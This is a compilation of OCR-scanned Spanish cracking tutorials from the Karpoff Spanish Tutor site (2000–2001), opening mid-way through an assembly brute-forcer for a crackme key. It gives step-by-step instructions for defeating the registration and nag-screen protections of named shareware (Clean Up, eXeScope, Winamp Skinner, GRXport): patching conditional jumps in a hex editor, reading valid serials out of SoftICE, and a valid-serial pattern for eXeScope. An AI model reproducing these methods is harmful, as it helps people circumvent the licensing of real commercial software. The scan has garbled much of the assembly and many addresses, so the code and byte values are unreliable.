mov ax, word ptr [esi+3] 
ifabh=="v" | ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="v" || ah=="v" 
inc uves 

.endif 


if al=="v" || al=="v" 
inc uves 
.endif 


mov ah, byte ptr [esi+7] 
ifabh=="v" | ah=="v" 
inc uves 

.endif 


If uves >2 
jmp masl 
.endif 


ds ole ale ode ole ale ode ole ole ole ole ole ode ole ale ode ole ale ode ole le ole ole ale ode ole ale ode ole le ode ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole ole ole ole als ole ole als ole ole le 
> 


; 
; no consentimos 2 x en las combinaciones 
> 


ds ole ale ode ole ale ode ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ale ole ole ale ode ole ale ode ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole ole ole ole als ole ole als ole ole als ole ole le 
> 


mov exis, O 


mov ax, word ptr [esi+1] 
ifah=="x" || ah=="x" 
inc exis 

.endif 


Af al=="x" [| al==" " 
inc exis 
.endif 


mov ax, word ptr [esi+3] 
if ah=="x" [| ah==" " 
inc exis 

.endif 


ifal=="x" || al=="x" 
inc exis 
.endif 


mov ax, word ptr [esi+5] 
ifabh=="x" | ah=="x" 
inc exis 

.endif 


if al=="x" || al=="x" 
inc exis 
.endif 


mov ah, byte ptr [esi+7] 
ifah=="x" || ah=="x" 
inc exis 

.endif 


If exis >1 
jmp masl 
.endif 


altajo: 


mov esi, offset buffer 

pusha 

inc esi ;inc esi para saltarse la h 

xor eax, eax 

xor edx, edx 

dec esi 

mov eax, 0f1c05789h ;este n? raro es para saltarse la comprovacion 
a3: ¡de la 1* h (nos evitamos un bucle de ffff ciclos) 
inc esi 

xor ah, [esi] 

a0: 

xor al, dl 

add eax, 04e493220h 

mov cl, al 

ror eax, cl 

xor eax, O55aaSaSah 

dec dx 


jnz a0 

cmp byte ptr [esi+1], O ¡en el ultimo bucle esi apunta a O 

jnz a3 ;por lo tanto siempre tendremos el mismo resultado 

xor eax, 0d202eef9h ;de esta forma nos evitamos otro bucle de ffffh ciclos 
popa 

jz escribir 

jmp masl 


leer: 

pusha 

invoke createfile,addr archivo, 1 
generic_read+generic_write, 1 

null, A 

null, 

open_existing, 1 

file_attribute_normal, 1 

null 

mov hfichero, eax 

invoke getfilesize,hfichero,null 

mov fsize, eax 

mov eax, Offffh 

invoke globalalloc, null,eax 

mov memptr,eax 

invoke readfile,hfichero,memptr,fsize,addr bread,null 
mov eax, memptr 

add eax, fsize 

sub eax, Oah 

invoke Istrcpyn,addr buffer , ; copio la cadena 
eax, 

9 

¡invoke globalfree, memptr 

invoke closehandle, hfichero 

popa 

ret 

escribir: 

pusha 

invoke createfile,addr archivo, 1 
generic_read+generic_write, 1 

null, A 

null, A 

open_existing, 1 

file_attribute_normal, 1 

null 

mov hfichero, eax 

invoke getfilesize,hfichero,null 

mov fsize,eax 

; add eax, Oah 

; invoke globalrealloc,memptr ,eax,null 
¡mov memptr,eax 

invoke readfile,hfichero,memptr,fsize,addr bread,null 
mov ebx, memptr 

add ebx, fsize 

invoke Istrcpyn,ebx , ; copio la cadena 
addr buffer, 

9 


mov dword ptr [ebx+8], Oa0dh 
mov ebx, fsize 

add ebx, Oah 

push ebx 

pop fsize 


invoke setfilepointer,hfichero,null,null,file_begin 
invoke writefile,hfichero,memptr,fsize,addr bwrite,null 
; Invoke globalfree, memptr 

invoke closehandle, hfichero 

popa 

jmp masl 


fin: 
invoke messagebox,null,addr sacabo,addr marmota,mb_ok 
invoke exitprocess,hinstance 


end start 


conclusiones 


creo necesario puntualizar algunos detalles que considero importantes. 

- casi al final del codigo, están las rutinas que comprueban si la cadena pasa los test. observad como se ha optimizado 
el codigo para aumentar la velocidad de proceso. podréis ver anotaciones que hemos ido haciéndonos sobre la marcha 
para sacarle el mayor partido posible. 

- hay muchas combinaciones que pasan los test y producen en el crackme el desencriptado del codigo. opino que es 
un fallo grave en la estructura del programa, ya que genera codigo impredecible y despues lo ejecuta. no se han dado 
casos de situaciones graves, pero estas cosas son peligrosas ;-). 

- Crack el destripador opina que tal y como esta planteada la protección, no tiene viabilidad comercial, ya que 
depende de un único serial, y ya sabemos todos como circulan los seriales xdddd. sería interensate este tipo de 
protección si el serial se montara en base a alguna peculiaridad del equipo donde rueda como por ejemplo el número de 
serie de windows. 

- como el marmó6.exe funciona en segundo plano y el sistema estaba bajo minimos para aumentar el tiempo de 
procesador dedicado al fb, utilizamos pupe para visualizar la evolucion de las combinaciones y matar el proceso 
cuando teniamos que ocuparnos de otras cosas. 

- agradecer a todos los que por unos días nos prestaron algo de su tiempo de procesador y corrieron en sus maquinas 
el marm6.exe 


crick 
avalanche 
jikay 
coheta 


un saludo muy especial a jotake y a crick que también invirtieron su tiempo en desentrañar el misterio de la clave del 
crackme +2 de ni2. 


antes de que se me olvide... la clave es heyboyos 
marmota éz crack el destripador a 31 de diciembre de 2000. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre ingenieria inversa y 


programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: Clean up 


PROTECCION: nombre de usuario / serial 

Objetivo: Encontrar el serial. 

Descripcion: 222797222797 9777 

Dificultad: newbie+ 

DOWNLOAD: http://www.worlinx.net/pgehart 

Herramientas: w32dasm, editor hexa, softice 4.05 

CRACKER: smÁS|-| £: !<oBDg0m FECHA: 22/01/2001 
introduccion 


ah.. un tutorial más.. qué tal te pareció el otro?? bien?? mal?? regular??.. bueno.. ésta vez atacaremos el programa con 
el desensamblador en lugar del soft ice.. 


el clean up sirve para limpiar los archivos "innecesarios" del disco.. una buena aplicación pero no vale 20 dlls!!! 
mucho menos la licencia de 1000 dlls!! la verdad no sé cómo se venden éstos productos.. pero bueno.. empecemos!!! 


al atake 


ok.. abrimos el ejecutable.. hmm?? no hay banner ni algo que nos diga que tenemos que comprar.. tratemos de registrarons.. 
file>register.. ponemos nuestros datos.. 


hmm.. 2 mensajes.. "invalid characters in user name”.. no le gustaron mis garabatos.. pero.. ni modo.. "name / code mismatch 
try again" qué feo mensaje no?? bueno.. ya tenemos una pista.. ataquemos por ahí.. abrimos el w32dasm... disassembler> open 
file to disassemble... buscamos nuestro programa víctima y lo abrimos.. esperamos unos cuantos segun2.. y listo.. damos click 


en [E] y aparecerá una ventanita.. buscamos nuestro "textito".. y unas 3 o 4 pantallas abajo lo encontramos.. damos doble 
click y aparecemos en un lugar parecido a ésto.. 


* referenced by a (u)nconditional or (c)onditional jump at addresses: 
| :004090e6(c), :00409100 (c) 


:0040916c 6a00 push 00000000 
:0040916e 6a00 push 00000000 


* possible stringdata ref from data obj ->"name / code mis-match. try again." 
| 
:00409170 68e4714100 push 004171e4 


hmm.. muy bonito.. debemos parchear ésos 2 saltos condicionales “pa que nunca llegue al mensaje de error.. vamos a la 
primera.. presionamos goto>code location y apuntamos 004090€6 .. así llegaremos a.. 


:004090e6 0f8580000000 jne 0040916c 


ok!! miramos el offset <un numerito que está hasta abajo de la pantalla del w32dasm y termina en 

h, por ejemplo aquí es.. OOOO90e6h la "h" significa hexadecimal, en el work shop <el editor hexa> pondremos "90e6" notemos 
que no se ponen los Os y tampoco la h.. 

muy bien!!! ahora busquemos el siguiente.. ya sabes.. goto>code location y anotamos 00409100 ahora.. llegamos aquí.. 


:00409100 746a je 0040916c 


miramos el offset y es.. 90€6.. 


muy bien!! abrimos el hex workshop <puedes usar tu editor hexadecimal favorito!!> y reemplazamos.. 


ahora salimos.. nos preguntará si queremos salvar.. decimos que sí <si te dice que hay error o estás corriendo el programa o 
estás en el w32 dasm, deberás cerrarlo> ahora, nos pregunta que si queremos hacer copia de seguridad.. decimos que sí.. 


ahora corramos el clean up.. ponemos cualquier nombre.. y.. 


sí!! ahora la prueba de fuego.. cerremos el programa y volvamos a abrirlo.. 


qué!?!? qué pasó!??! no nos registró!!! sólo nos mostró el mensaje!!! hmm.. borramos el ejecutable y le cambiamos el nombre 
al archivo "cleanup.bak" a "cleanup.exe".. 


aquí es donde entra el amado softice!!! abramos el symbol loader <el programa que está junto al directorio del soft ice.. el 
ejecutable llamado "loader32.exe"> ahora démosle file>open module buscamos el programa y lo cargamos.. ahora 


presionamos E y entraremos al soft ice.. ahí pondremos el salto que vimos en el w32 dasm.. pero cuál?? probemos el 
00409100 así que.. 


bpx 00409100 

damos enter y ctrl+d.. ahora estamos en el programa.. damos file>register... ponemos nuestros datos.. 
name: smash <-- ok.. ya que no aceptó mis garabatos 

code: 1111 


muuuy bien!! damos enter y entraremos al soft ice.. nos damos cuenta que estamos en el ejecutable.. desde aquí buscaremos 
nuestro +*.. busquemos algo sospechoso.. 


d eax <-- nada 

d ebx <-- nada.. 

d ecx <-- bien!! nuestro +!!! debemos estar cerca!! * 

d edx <-- un + sospechoso.. apuntémoslo.. * 

veamos.. mi serial es d168cfa5.. entonces ponemos.. file>register 


name: smash 


code: d16bcfa5 


extrañamente, si nuestro ++ está en letras minúsculas, el programa no lo acepta.. y el código de registro es diferente para cada 
usuario.. 


*nota!! algo muy común que me pasaba al leer otros tutoriales es que decía de forma similar a ésta que estoy presentando.. lo 
que yo no sabía es dónde estaba mi número.. pues bien, al entrar al softice, podemos ver 3 ventanas con flechitas, si no 
tenemos el mouse activado tendremos que movernos con las teclas.. para movernos dentro de la pantalla de en 1/2 <donde está 
el lenguaje del ensamblador> damos ctrl+arriba o abajo y arriba de ésta pantalla hay otra.. con los valores en hex.. a ésta la 
movemos con alt+arriba/abajo.. aquí veremos nuestro número y el número "bueno".. 


despedida 


como dije en mi tutorial pasado.. éste tutorial es de un newbie para un newbie.. lo hago para compartir mis conocimientos y 
escribir tutoriales como me hubiera gustado que me enseñaran a mí.. creo que ya me gustó hacer tutoriales jeje.. es divertido!! 


como en cada tutorial.. quiero recalcar que por ningún motivo tratamos de perjudicar el trabajo del programador!!! al 
contrario!! tratamos de mejorar las protecciones de los programas que ellos hacen!! y para quien se dedica a desprotegerlos.. 
es con solo fines intelectuales.. no lucrativos!! 


por segunda vez, quiero agradecer a la compilación de tutoriales del prOfesor_x y por su apoyo personal para hacer éste 


tutorial.. también a la gran página de karpoff.. posiblemente la mejor página de tutoriales en español!! y.. finalmente.. a quien 
se tomó la molestia de leer éste tutorial.. 


si tienes dudas, a smash O gamehacks.net "porqué ésto.. porqué aquello??" son aceptables.. más, como la mayoría de los 
crackers no aceptamos "cómo se hace??" "me podrías crackear..??" para éso es éste tutorial!! para aprender!! si te gusta el 


programa y estás seguro que lo usarás.. cómpralo!! y recompensa el trabajo del programador!! 


salu2 a to2 los crackers de lengua española! ! 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 


Objetivo: 
Descripcion: 
Dificultad: 


DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
eXeScope 6.0 


Serial. 
Conseguir el número y hacer la plantilla para obtenerlos. 


Permite conocer datos de un programa y efectuar modificaciones 
cosméticas (menús, iconos, etc.) 


Novato 


http://welcome.to/karpoff 


Softice 


Caos reptante FECHA: 01/01/01 


introduccion 


este programa pide que nos registremos si vamos a usarlo durante más de dos semanas y nos permite 
hacerlo introduciendo un número de serie correcto. en la mayoría de programas -como en este caso-, 
cuando se introduce un número erróneo -por equivocación, naturalmente ;0) -nos aparece un mensaje más 
o menos contundente diciendo que nos hemos equivocado; algunos programadores más astutos omiten este 
mensaje para dificultar la honesta labor de las buenas gentes que se dedican a crackear programas. pero lo 
que casi siempre aparece cuando se introduce el número correcto, es un mensaje dando las gracias por 
registrarse etc. -lo cual es muy gratificante- :0) . pues en este caso no aparece nada, ni da las gracias, ni 
aparece como registrado en about exescope... ni nada. la única manera de saber con seguridad que el 
programa está registrado es modificar un programa un par de veces, ya que la versión no registrada sólo 
permite hacerlo una vez. es lamentable que después de gastarse uno sus buenos dineros ni siquiera se le 
den las gracias... :o( 


al atake 


en primer lugar, trataremos de registrarnos (en help / regist) introduciendo nuestro nombre y número, pero este va a ser un 
tutorial tramposo y vamos a poner un número casi bueno, ya que esto va a facilitar la explicación del proceso de 
comprobación del serial number. en cuanto al nombre, como veremos, no tiene ninguna relación con dicho proceso. 
pondremos pues: caos reptante y 1234541910. antes de pulsar ok, haremos ctrl+d para entrar en el softice e introduciremos 
el correspondiente breakpoint, en este caso recurriremos al casi infalible bpx hmemcpy, ya que si probamos bpx 
getdlgitemtexta o bpx getwindowtexta que son las alternativas más corrientes veremos que son menos infalibles. a 
continuación pulsaremos f5 para volver al exescope. ¡plof! al pulsar ok, ha actuado el softice y vemos que nos hemos caído 
en kernel. 

de nuevo le damos a f5, ya que hay que leer dos cadenas de texto. ahora hay que salir de aquí y volver al exescope. 
pulsamos f12 siete veces y aparecemos aquí: 


0167:00437922 5e pop esi 
0167:00437923 5b pop ebx 
0167:00437924 c3 ret 


empezamos a tracear con f10, vemos varios calls a la vuelta de los cuales el programa ejecuta algunas instrucciones que no 
parecen tener interés para nosotros. pero al llegar aquí: 


0167:004807d1 e85a790000 call 00488130 
0167:004807d6 84c0 test al, al 
0167:004807d8 0f848d000000 je 0048086b 


vemos que al regresar del call comprueba el valor de al. como nuestro número no es lo bastante bueno, el valor de eax será 
0, y si continuamos, se efectuará el salto y caeremos en el foso de los cocodrilos. también podemos cambiar el valor a 1 
mediante r eax y el programa quedará registrado. no es eso lo que queremos... de momento, y por lo tanto entraremos en 
el call. 


0167:00488130 55 push ebp 

0167:00488131 8bec mov ebp, esp 

0167:00488133 51 push ecx 

0167:00488134 53 push ebx 

0167:00488135 8955fc mov dword ptr [ebp-04], edx 
0167:00488138 8b45fc mov eax, dword ptr [ebp-04] 
0167:0048813b e8f0bbf7ff call 00403d30 

0167:00403d30 85c0 test eax, eax 

0167:00403d32 7409 je 00403d3d 

0167:00403d34 8b50£8 mov edx, dword ptr [eax-08] 
0167:00403d37 42 inc edx 

0167:00403d38 7e03 jle 00403d3d 

0167:00403d3a 8950f8 mov dword ptr [eax-08], edx 
0167:00403d3d c3 ret 

0167:00488140 33c0 xor eax, eax 

0167:00488142 55 push ebp 

0167:00488143 68b2814800 push 004881b2 

0167:00488148 64ff30 push dword ptr fs: leax] 
0167:0048814b 648920 mov dword ptr fs: [eax], esp 
0167:0048814e 33db xor ebx, ebx 

0167:00488150 8b45fc mov eax, dword ptr [ebp-04] 
0167:00488153 e824baf7ff call 00403b7c 


aquí empieza lo interesante :0) 


0167:00403b7c 85c0 test eax, eax <- comprueba la longitud del número 

0167:00403b7e 7403 je 00403b83 introducido, si es cero, salta 

0167:00403b80 8b40fc mov eaxX, dword ptr [eax-04] 

0167:00403b83 c3 ret 

0167:00488158 83£80a cmp eax, 0000000a <- comprueba que el número es de 10 
cifras 

0167:0048815b 753f jne 0048819c 


0167:0048815d 8b55fc mov edx, dword ptr [ebp-04] <- la dirección del número 
0167:00488160 b8c8814800 mov eax, 004881c8 <- la dirección de un string 
interesante: "al910" 

0167:00488165 e89%ebcf7ff call 00403e08 

0167:00403e08 85c0 test eax, eax 

0167:004038e0a 7440 je 00403e4c 

0167:00403e0c 85d2 test edx, edx 

0167:00403e0e 7431 je 00403e41 

0167:00403e10 53 push ebx 

0167:00403e11 56 push esi 

0167:00403e12 57 push edi 

0167:00403e13 89c6 mov esi, eax <- la dirección de "a1l910" 

0167:00403e15 89d7 mov edi, edx <- la dirección de nuestro número 

0167:00403e17 8b4ffc mov ecx, dword ptr [edi-04] <- a=longitud del número 

0167:00403ela 57 push edi 

0167:00403e1lb 8b56fc mov edx, dword ptr [esi-04] <- 5=longitud de "al910" 

0167:00403ele a dec edx <- 4 

0167:00403e1f 781lb js 00403e3c <- salta si edx=0 

0167:00403e21 8a06 mov al, byte ptr [esi] <- 4l=código ascii de "a" 

0167:00403e23 46 inc esi <- apunta ahora a "1910" 

0167:00403e24 29d1 sub ecx, edx <- a-4=6 

0167:00403e26 7el4 jle 00403e3c <- no salta 

0167:00403e28 f2ae repnz scasb <- busca entre los 6 primeros 

Caracteres (ecx)la letra "a" (al) 

0167:00403e2a 7510 jne 00403e3c <- no salta (la ha encontrado) 

0167:00403e2c 89%cb mov ebx, ecx 

0167:00403e2e 56 push esi <- la dirección de "1910" 

0167:00403e2f 57 push edi <- la dirección de nuestro número 0167:00403e30 

89d1 mov ecx, edx <- 4 

0167:00403e32 f3a6 repz cmpsb <- compara los 4 (ecx) caracteres que siguen 
a "a" para ver si son "1910" (edi/esi) 

0167:00403e34 5f pop edi 

0167:00403e35 5e pop esi 

0167:00403e36 740c je 00403e44 <- salta porque hasta ahora nuestro 


número es lo bastante bueno 


lo que ha pasado hasta ahora es que el programa ha verificado que el número que hemos introducido es de 10 cifras y que 
entre ellas están a1910. si no están, repite exactamente el mismo proceso con el número a1423. si tampoco lo encuentra, 
nos manda a paseo. 


0167:00403e44 5a pop edx <- la dirección de nuestro número 
0167:00403e45 89f8 mov eax, edi <- la dirección del número que sigue a a 
0167:00403e47 29d0 sub eax, edx <- nos da el número de orden de a (4) 
0167:00403e49 5f pop edi 

0167:00403e4a 5e pop esi 

0167:00403e4b 5b pop ebx 

0167:00403e4c c3 ret 

0167:0048816a 48 dec eax <- 4-1=3 

0167:0048816b 7410 je 0048817d <- salta si es O 


aquí descubrimos que nuestro número debería haber empezado por a para que efectuara este salto, ya que de no hacerlo nos 
echa. nosotros queremos continuar, para esto tenemos que evitar el salto. para ello, podemos modificar el valor de eax 
directamente con el ratón o con r eax o bien modificando el salto: cuando la linea blanca está sobre la instrucción del salto, 
es decir, cuando es la siguiente instrucción a ejecutar, con d eip y el ratón o a eip y jne 0048817d. continuamos: 


0167:0048817d 8b45fc mov eaxX, dword ptr [ebp-04] <- la dirección de nuestro 
número 
0167:00488180 0fb64008 mOVZX €eax, byte ptr [eax+08] <- 31=código ascii de 1 (el 
noveno número) 
0167:00488184 8b55fc mov edx, dword ptr [ebp-04] <- la dirección de nuestro 
número 
0167:00488187 0fb65209 movzx edx, byte ptr [edx+09] <- 30=código ascii de O (el 
décimo número) 
0167:0048818b 03c2 add eax, edx <- eax=31+30=61 


0167:0048818d b90a000000 mov ecx, 0000000a <- ecx=a 


0167:00488192 99 cda <- ¿para que? 

0167:00488193 f£7f9 idiv ecx <- se divide eax (61) por ecx (a) y 
el resto se coloca en edx (7) 

0167:00488195 83fa04 cmp edx, 00000004 <- compara 7 con 4 ¡ay! 

0167:00488198 “7502 jne 0048819c <- hasta aquí llegamos 


la siguiente condición que se nos impone es que la suma de los códigos ascii de los números 9* y 10%, dividida por a nos dé 
un resto de 4. si para simplificar contamos únicamente con números del O al 9, tendremos que la suma de los dos números 
será igual a 30 + 9 +30 +10", (ya que el código hexadecimal ascii de los números va del 30 para el O al 39 para el 9) es 
decir 60 + 9” + 10%. si lo pasamos a decimal, ya que el hexadecimal sólo es para uso de seres con ocho dedos en cada 
mano, tendremos 96 + 9% + 10”. dividimos 96 por 10 y nos queda un resto de 6. así pues, ¿cuánto deben sumar los números 
9” y 10” para que sumados al seis y dividido por diez nos dé un resto de 4? deben sumar 8. bien, si modificaramos el salto 
para continuar tendríamos: 


0167:004881%a b301 mov bl, 01 

0167:0048819%c 33c0 xXor eax, eax 

0167:0048819%e 5a pop edx 

0167:0048819f 59 pop ecx 

0167:004881a0 59 pop ecx 

0167:00488la1l 648910 mov dword ptr fs:[eax], edx 
0167:00488l1a4 68b9814800 push 004881b9 

0167:004881la9 8d45fc lea eax, dword ptr [ebp-04] 
0167:00488lac e84fb7f7ff call 00403900 


bueno, parece que lo que sigue ya no nos interesa. es el momento de sacar conclusiones. 
cualquier serial number válido debe tener la siguiente configuración: 


A'abenon 


1423 donde abc representan los tres caracteres que os pida el cuerpo y nn dos números cuya 
suma sea 8. elegir entre 1910 Ó 1423 es a gusto del consumidor. fácil ¿no? 
también podéis buscar otras combinaciones, por ejemplo: son válidos números como: al910saral ó a1423manul. 


antes de terminar, debo recordaros que esto no es más que un ejercicio intelectual y que si queréis utilizar regularmente el 
programa deberéis romper la hucha con vuestros ahorros y entregarlos a unas manos rapaces que ya los están esperando. 


mi dirección de e-mail es: caos_reptante O hotmail.com 


finalmente un saludo para todos los que hayáis leído este tutorial, para mi amigo valentín por empujarme al mal camino y 
especialmente para karpoff junto con mi agradecimiento. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 
Dificultad: 
DOWNLOAD : 
Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 


Winamp Skinner 


nombre/serial 

encontrar un *+ válido 

un programa para hacer skins “pal winamp 
newbie 


http://members.tripod.com/ajie q 


soft ice 4.05 


smAs|-| s !<eggo0m FECHA: 


introduccion 


11/01/01 


bueno.. éste es mi primer tutorial, me animé a hacerlo porque recientemente he visto que newbies <como yo> 
hacen tutoriales para "compartir" lo que saben, ya sea mucho o poco, pero con la idea de enseñar.. 


el skinner es un programa “pa hacer skins <a poco?!?!> “pal winamp.. es un programa un tanto útil y la 
protección.. deja algo que desear, pero nos servirá “pa aprender un poco más 


al atake 


bueno, abramos el skinner y veamos.. help > about > register.. ponemos nuestros datos. . 


Smásgi 


1111 


damos ok.. y... nada?!?! nada?!?! no hay mensaje!!! hmm.. reflexionemos.. si lo desensamblamos.. hmm.. mala 
idea.. mejor usemos nuestro complicado y queridísmo softice.. 


cárguenlo!! yo los espero..!!! 


hmm.. 


ya?? 


ok!! 


qué hacemos ahora?? pongamos un break point.. cuál?? 
intentemos con hmemcpy.. pongamos nuestros datos.. nuestro +.. y el bpx: 


bpx hmemcpy 


ok!! hasta ahora todo bien?? 
pulsamos ok.. y sorpresa!! dentro del softice!! 


bueno, como el soft ice “pesca” todo, absolutamente todo, lo primero que checa es el nombre, lo cual no nos 
interesa así que presionamos 


f5 

ahora ya estamos en donde comprueba el +*.. así que nos adentramos con f12 “pa entrar a buscar nuestro +f.. 
veamos.. 

empecemos a tracear.. <ya saben, £10> hasta que lleguemos a un lugar como éste.. 


00406090 ffd7 call edi <-- llama al mensaje “edi” 

00406d92 8d44240c lea eax, [esp+0c] <-- eax es ahora esp+0c 
00406096 50 push eax <-- guarda eax 

00406d97 e894100000 call 00407e30 <-- llama a un salto más abajo 
00406d9c 830404 add esp, 04 <-- se le agrega 4 a esp 

00406d9f 8bd8 mov ebx, eax <-- ebx y eax valen lo mismo 
00406dal 8d442438 lea eax, [esp+38] <-- eax ahora es esp+38 
00406da5 50 push eax <-- guarda eax 


00406da6 e8550f0000 call 00407400 <-- llamada a una cadena abajo 

00406dab 83c404 add esp, 04 <-- se le agregan 4 a esp 

00406dae 8bf8 mov edi, eax <-- edi y eax valen lo mismo 

00406db0 85ff test edi, edi <-- checa el resultado 

00406db2 7537 jnz 00406deb <-- rutina de comprobación 

00406db4 833d3c52420000 cmp dword ptr [0042523c] ,00 <-- una comparación 
00406dbb 7417 jz OO406dd4 <-- un pequeño salto para abajo 


muy bien!! checa el área marcada es el área de la comprobación.. a ver.. revisemos.. 
? eax = 0000001111 <-- nuestro +!!! 
2 ebx = 000584665 <-- el + correcto!! 


ahora, vamos a nuestro programa.. y.. bingo!! 


Winamp Skin Maker 1.2 


ua 
Ya Bar... . 


e-mail : gautama(bdg.centrin.net.id 


http:/l/members.tripod.com/ajle_q/ 


pero al hackear.. nuestro objetivo es aprender al máximo.. veamos otra forma de llegar a éste punto.. 
produjimos el serial con el hmemcpy.. pero tal vez pueda servir otro no?? 
a ver.. intentemos.. 


bpx getwindowtexta <--hmm no.. no puede ser, ya que no da un cuadro de diálogo o algo similiar 
bpx messageboxa <-- por la misma razón que la de arriba 
bpx getdlgitemtexta <--wow!! éste picó!!! 


ahora, presionamos f5 <ya que lo primero que es comprobado, es el nombre.. y con f5 lo dejamos seguir 
trabajando> 

ahora picó otra vez.. presionamos f12 “pa meternos en el programa, aquí, si se fijan bien es casi la misma zona 
en la que estábamos anteriormente.. 

damos f10 9 veces y llegamos a la misma zona que es explicada arribita.. 


>>despedida.. 

bueno.. me despido de éste, mi primer tutorial, recuerda que sólo es “pa aumentar conocimientos!!! de ninguna 
manera, tratamos de perjudicar el trabajo de los programadores!!! una vez más, si vas a usar el programa.. 
cómpralo!! 


quiero agradecer a to2 los crackers españoles, a la compilación de tutoriales del profesor_x, al grupo de 


karpoff, por siempre tener tan buenos tutoriales <y por recibir el mío..> y principalmente.. a tí, que leíste mi 
tutorial de arriba a abajo.. 


ah!! otra cosa.. si ven que me equivoqué en algo, alguna falta de ortografía.. lo que sea..!! dímelo!! así 
mejoraré!! también se aceptan sugerencias y dudas.. lo que sea!! ah.. y otra cosa.. recuerda que ésto es un 
tutorial de un newbie “pa un newbie..!!! 


por hoy es todo.. nos vemos!! hasta siempre! ! 


si tienes alguna duda mándame un mail a smash gamehacks.net 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 2001 


Programa: GRXport v1.0 (build 200400) 
PROTECCION: Limitación de Tiempo (30 días) y de archivos a exportar. 
Objetivo: Quitar las 2 Nag's sCREENS y el limite de 20 archivos a exportar. 
E . Pequeña utilidad para generar archivos GRX (archivos de 
Descripcion: aid ; 
exportación para GetRight). 
Dificultad: Principiante. 
DOWNLOAD: http: //www.autoMATion-software.co.uk 
. file insPEctor, SoftICE y Editor Hexadecimal (yo usaré el Hexwork 
Herramientas: 
Shop v 3.01). 
CRACKER: Profesor X FECHA: 11/1/2001 


introduccion 


hola amigos espero que, vayan avanzando en este mundillo del cracking que es 


facinante y como dice el lema del grupo al cual pertenesco tnt crack team :: el conocimiento 
es nuestro poder !!, ahora en este tutorial analizaremos y aprenderemos como quitar molestas nags screen” s, las cuales nos 
recuerdan que no estamos registrados y que tenemos que pagar no se cuantos dolares para ser usuarios registrados, en uno de mis 
primeros tutoriales hable de como quitar las nags screens con ayuda del softice ejecutando el programa con el symbol loader, 
ahora ocuparemos otra forma diferente de borrar esas nag” s screen con unos breakpoints muy utiles que sirven para la mayoria de 


las nagís screens que son: Yetdialogindirectparama y enable window, para este programa de 
ejemplo el grxxport podremos usar cualquiera de los dos breakpoints, empezemos con 
este menjurgue .....m..... 


al atake 


comentario del programa 


e pequeña utilidad para generar archivos grx ( archivos de exportación para getright 
lo que nos interesa...el programa es shareware con libre uso de 30 días, y para registrarse hay que pagar $? us. 


pero tenemos a nuestro querido amigo.... softice...... jejeejejejejj!!!!! := 
objetivos 


1. quitar las dos molestas nag's screens 
2. quitar limite de 20 archivos a exportar en la opción : auto numbering form 


manos a la obra 


antes de abrir el programa lo analizamos con file inspector v4.0 el que nos mostrará información realmente importante 
a la hora de atacar el programa; bueno el file inspector nos mostrará los siguientes datos: 


e el programa está desarrollado en microsoft visual c++v 5.0 
e no está empacado 


a continuación...cerramosfile inspector v4.0y abrimosgrxport v1.0 (build 200400) y lo primero que aparece es una 
nag screen como esta: 


GRXport 
a product by autoMA Tion softwwe 
> Product information: — 
Versiont ; 10 
Buld : (200400) DEMO 
Relsase Dale . 20th Apel 2000 


Licence Information: 
This product iz a DEMO version 


You are entitled to use il for a trial period of 30-days only. Añtes 
which you MUST register or delete it. For detads on registering 
please vist the autoMA Tion software web page Ested below or 
consult the README.TXT file mchaded with this package. 


Coritact Information: 
Web Page Address : ww autoMA Tionsoftware.co. uk 
E-Mad Address: - autoMA Tion_sofwareGhotmadl com | 


7] 


damos click en el boton de ok y nos manda a otra ventana como esta: 


GRXport 
for Windows 95/98/NT/2000 


You are entitled t 


vá.0 


ais program for a trial period of 30 days only 


After v u must register it or delete it 


http: 42. autoMá Tion-software.co.uk 


y unos dos segundos despues se ejecuta el programa, el objetivo quitar esas dos molestas nag's screens y 


el limite de 20 archivos exportados. 


usando el softice primera nag 


screen 


asumo que tienes bien configurado el softice y que tienes al menos conocimientos básicos sobre su uso. 


a continuación...cargamos el softice y damos f5 y ponemos un break point bpx enablewindow , damos enter y despues 
f5 y ejecutamos el programa grxport , y saltamos rapidamente al softice damos f12 dos veces y aparecera la primera 
ventana, damos click en el boton ok de la primera ventana y saltamos otra vez al softice y damos f12 otra vez y 

apareceremos aqui: 


:004018a5 


:004018aa 


:004018ae 


:004018b3 


:004018b7 


:004018bc 


:004018bd 


:004018c4 


:004018c9 


:004018ca 


:004018cf 


:004018d2 


e8f£2160000 


8d4c2410 


e827180000 


8b4c2414 


bb02000000 


51 


889c2438050000 


e8a7100000 


56 


e8e1100000 


83c408 


8d8ea0010000 


call 00402f9c <-—llamada que genera la lra ventana 


lea ecx, dword ptr [esp+10]<-—caemos aqui 
call 004030da 
mov ecx, 


dword ptr [esp+14] 


mov ebx, 00000002 
push ecx 
mov byte ptr [esp+00000538], bl 
call 004029a0 


push esi 


call 004029b0 <-—- llamada que genera la 2da. 


add esp, 00000008 


lea ecx, dword ptr [esi+000001a0] 


como podemos ver caemos en el softice despues de dar el ultimo f12 una linea despues de la call que genera la ventana, 
bueno entonces lo que hay que hacer es anular esa llamada, como ????....jejje facil facil..... apuntamos la dirección de 
memoria en la cual se encuentra esa llamada y desensamblamos el ejecutable del grxport con el w32dasm y vamos a esa 
dirección de memoria y sacamos su offset, no les dire como sacar el offset por que si han leido todos mis tutoriales, he 


hexwork shop v 3.01, abrimos una copia del ejecutable en el editor hexadecimal y damos control g y aparecera una ventana 
en la cual insertaremos el offset obtenido, damos click en el boton llamado go y listo nos colocaremos en los bytes a 
cambiar que son 5 bytes e8 £2 16 00 00por 90 90 90 90 90 cambiemoslo y guardemos los cambios y ejecutemos el 


